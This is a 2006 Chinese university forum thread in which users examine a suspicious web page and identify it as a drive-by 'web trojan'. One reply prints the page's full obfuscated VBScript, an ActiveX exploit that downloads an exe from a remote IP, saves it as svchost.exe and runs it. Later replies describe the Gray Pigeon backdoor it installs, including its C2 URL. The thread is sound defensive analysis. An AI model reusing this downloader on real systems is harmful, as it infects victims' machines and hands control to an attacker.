碧海潮声大学生网

标题: 大家帮我看看这个有问题么 [打印本页]

作者: only    时间: 2006-10-23 15:05
标题: 大家帮我看看这个有问题么
大家帮我看看这个有问题么
1个网友让我打http://jslkwjslkw.id666.com/user/jslkwjslkw/disk/webdisk/xin.htm
我就打开了,发现1片空白,查看源码,发现
http://222.73.4.122/11.exe
可以下载,我下载后,卡巴斯基未报!
请各位帮我看看这个有无毒
谢谢
作者: starshow0571    时间: 2006-10-23 16:16
<html>
<title></title>
<script language="VBScript">
on error resume next
dl = "http://222.73.4.122/11.exe"
j1="clsid:"
   j2="BD96C556-"
   j3="65A3-"
   j4="11D0-"
   j5="983A-"
   j6="00C04FC29E36"
   j7=j1&j2&j3&j4&j5&j6
   xx="object"
   xxx="classid"
   xxxx="Scripting.FileSystemObject"
   dd="open"
   Set df = document.createElement(xx)
   df.setAttribute xxx, j7
   b4="Mi"
   b5="cr"
   b6="o"
   b7="soft"
   b8=".X"
   b9="M"
   b10="L"
   b11="H"
   b12="T"
   b13="T"
   b14="P"
   strb1=b4&b5&b6&b7&b8&b9
   strb2=b10&b11&b12&b13&b14
   strb=strb1&strb2
   Set x = df.CreateObject(strb,"")
   a4="A"
   a5="d"
   a6="o"
   a7="d"
   a8="b"
   a9="."
   a10="S"
   a11="t"
   a12="r"
   a13="e"
   a14="a"
   a15="m"
   strd1=a4&a5&a6&a7&a8&a9
   strd2=a10&a11&a12&a13&a14&a15
   strd=strd1&strd2
   set SS = df.createobject(strd,"")
   SS.type = 1
   f4="G"
   f5="E"
   f6="T"
   stre=f4&f5&f6
   x.Open stre, dl, False
   x.Send
   marco1="svchost.exe"
   set F = df.createobject(xxxx,"")
   tmp2=2
   set tmp = F.GetSpecialFolder(tmp2)
   SS.open
   marco1= F.BuildPath(tmp,marco1)
   SS.write x.responseBody
   SS.savetofile marco1,2
   SS.close
   z1="She"
   z2="ll.A"
   z3="ppli"
   z4="cat"
   z5="io"
   z6="n"
   zz=z1&z2&z3&z4&z5&z6
   set Q = df.createobject(zz,"")
   Q.ShellExecute marco1,"","",dd,0
   </script>
   <head>
   <title></title>
   </head><body>
   </body></html>
作者: starshow0571    时间: 2006-10-23 16:17
[mop011] 是个网马吧!
你想让我们论坛里的人当肉鸡啊? [s:33]
作者: only    时间: 2006-10-23 17:15
不知道是不是网马,从源码中能看出下载1个http://222.73.4.122/11.exe
我卡巴斯基未报....你们用其他软件检测下这个!
作者: 大麻哈鱼    时间: 2006-10-23 17:53
肥鸽子一只。
老家http://222.73.4.122/ip.txt
HKLM\SYSTEM\ControlSet?(?取决于HKLM\SYSTEM\Select下的current值)建立服务,服务名11.
生成%systemroot%\system32\qq.exe
作者: only    时间: 2006-10-23 20:27
引用第4楼大麻哈鱼2006-10-23 17:53发表的“”:
肥鸽子一只。
老家http://222.73.4.122/ip.txt
HKLMSYSTEMControlSet?(?取决于HKLMSYSTEMSelect下的current值)建立服务,服务名11.
生成%systemroot%system32qq.exe
%systemroot%\system32\qq.exe
无qq.exe啊
我是不是中标了?
我靠前几天周扒皮中鸽子入侵惟一中鸽子,我靠!
作者: 我是誰    时间: 2006-10-23 21:11
我下了这个11.exe,毫不犹豫就双击了,NOD32没有报警。看了看system32,果然有QQ.exe
反正我是要重装系统的,嘿嘿。因为这个系统装SQL2005装坏了,不得不重装,但手头上有项目没完成,所以拖了几天。所以什么危险操作都敢做。哈。现在开始重装吧。
作者: only    时间: 2006-10-23 21:37
为什么我的
%systemroot%\system32\qq.exe
无qq.exe啊
作者: starshow0571    时间: 2006-10-24 10:56
引用第4楼大麻哈鱼2006-10-23 17:53发表的“”:
肥鸽子一只。
老家http://222.73.4.122/ip.txt
HKLMSYSTEMControlSet?(?取决于HKLMSYSTEMSelect下的current值)建立服务,服务名11.
生成%systemroot%system32qq.exe
这位大哥蛮N的,呵呵!
作者: starshow0571    时间: 2006-10-24 10:58
引用第7楼only2006-10-23 21:37发表的“”:
为什么我的
%systemroot%system32qq.exe
无qq.exe啊
也许是被隐藏了 !!!!
作者: starshow0571    时间: 2006-10-24 10:59
引用第5楼only2006-10-23 20:27发表的“”:

%systemroot%system32qq.exe
无qq.exe啊
我是不是中标了?
我靠前几天周扒皮中鸽子入侵惟一中鸽子,我靠!
靠!说我啊?MS这句话也是病句啊!
我可没搞过你啊!
作者: starshow0571    时间: 2006-10-24 11:06
引用第6楼我是誰2006-10-23 21:11发表的“”:
我下了这个11.exe,毫不犹豫就双击了,NOD32没有报警。看了看system32,果然有QQ.exe
反正我是要重装系统的,嘿嘿。因为这个系统装SQL2005装坏了,不得不重装,但手头上有项目没完成,所以拖了几天。所以什么危险操作都敢做。哈。现在开始重装吧。
你好强,这么危险的操作都敢!不过我也敢啊,用学校的机子,反正是硬件还原的!呵呵!
重装啊?那还不如去还原了?
作者: 海院の水水    时间: 2006-10-24 14:58
偶也不怕  在网吧  ````````````````  偶巴不得搞死他
作者: 笨笨啊    时间: 2006-10-24 16:46
呵呵,这个运行有什么好怕的啊
开好regmon和filemon,监视一下他做过什么,嘿嘿

不过我的系统是影子的,再怎么厉害重启一下搞定
作者: fegor    时间: 2006-10-26 14:31
这个就是现在最流行的MS06014网马了。
有卡巴的都升级到6.0吧。
中了也不怕。6.0行为杀毒很牛比的。。。鸽子即使免杀了也过不了这关。。。。
作者: starshow0571    时间: 2006-10-26 18:08
引用第14楼fegor2006-10-26 14:31发表的“”:
这个就是现在最流行的MS06014网马了。
有卡巴的都升级到6.0吧。
中了也不怕。6.0行为杀毒很牛比的。。。鸽子即使免杀了也过不了这关。。。。
不知道什么网马!
不顾哦我知道现在的MS06040网马早就过不了杀软了,MS楼上的说错了吧!
是MS06040吧!
作者: 蓝阳辉    时间: 2006-10-26 18:43
引用第13楼笨笨啊2006-10-24 16:46发表的“”:
呵呵,这个运行有什么好怕的啊
开好regmon和filemon,监视一下他做过什么,嘿嘿

不过我的系统是影子的,再怎么厉害重启一下搞定
一般人都不会这个的。....




欢迎光临 碧海潮声大学生网 (http://www.zjoubbs.com/) Powered by Discuz! X3.2